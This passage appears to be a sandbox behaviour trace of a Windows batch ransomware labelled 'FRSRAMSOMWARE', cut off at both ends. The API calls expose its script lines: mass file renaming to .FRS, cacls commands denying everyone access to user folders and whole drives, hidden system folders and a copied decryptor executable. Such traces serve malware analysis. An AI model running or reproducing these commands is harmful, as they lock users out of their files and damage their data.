lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0073.207] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0073.207] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0073.208] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.208] GetFileType (hFile=0x254) returned 0x1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0073.208] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0073.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0073.208] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.208] GetFileType (hFile=0x254) returned 0x1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0073.208] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0073.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0073.208] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.208] GetFileType (hFile=0x254) returned 0x1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0073.208] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0073.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0073.208] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.208] GetFileType (hFile=0x254) returned 0x1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0073.208] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0073.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0073.208] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.208] GetFileType (hFile=0x254) returned 0x1 [0073.208] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0073.209] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0073.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0073.209] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.209] GetFileType (hFile=0x254) returned 0x1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0073.209] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0073.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0073.209] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.209] GetFileType (hFile=0x254) returned 0x1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0073.209] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0073.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0073.209] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.209] GetFileType (hFile=0x254) returned 0x1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0073.209] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0073.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0073.209] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.209] GetFileType (hFile=0x254) returned 0x1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0073.209] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.209] SetFilePointer (in: hFile=0x254, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0073.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0073.210] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.210] GetFileType (hFile=0x254) returned 0x1 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0073.210] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0073.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0073.210] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.210] GetFileType (hFile=0x254) returned 0x1 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0073.210] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0073.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0073.210] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.210] GetFileType (hFile=0x254) returned 0x1 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0073.210] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0073.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0073.210] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.210] GetFileType (hFile=0x254) returned 0x1 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0073.210] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0073.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0073.210] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0073.211] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.211] GetFileType (hFile=0x254) returned 0x1 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0073.211] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0073.211] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0073.211] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.211] GetFileType (hFile=0x254) returned 0x1 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0073.211] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0073.211] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0073.211] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.211] GetFileType (hFile=0x254) returned 0x1 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0073.211] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0073.211] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0073.211] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.211] GetFileType (hFile=0x254) returned 0x1 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0073.211] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0073.211] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0073.211] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0073.211] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.211] GetFileType (hFile=0x254) returned 0x1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0073.212] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0073.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0073.212] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.212] GetFileType (hFile=0x254) returned 0x1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0073.212] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0073.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0073.212] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.212] GetFileType (hFile=0x254) returned 0x1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0073.212] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0073.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0073.212] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.212] GetFileType (hFile=0x254) returned 0x1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0073.212] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0073.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0073.212] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.212] GetFileType (hFile=0x254) returned 0x1 [0073.212] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0073.212] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0073.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\nSRAMSOMWARE\\Chinese_national_flag.png") returned 80 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0073.213] _get_osfhandle (_FileHandle=3) returned 0x254 [0073.213] GetFileType (hFile=0x254) returned 0x1 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0073.213] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0073.213] SetFilePointer (in: hFile=0x254, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0073.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy 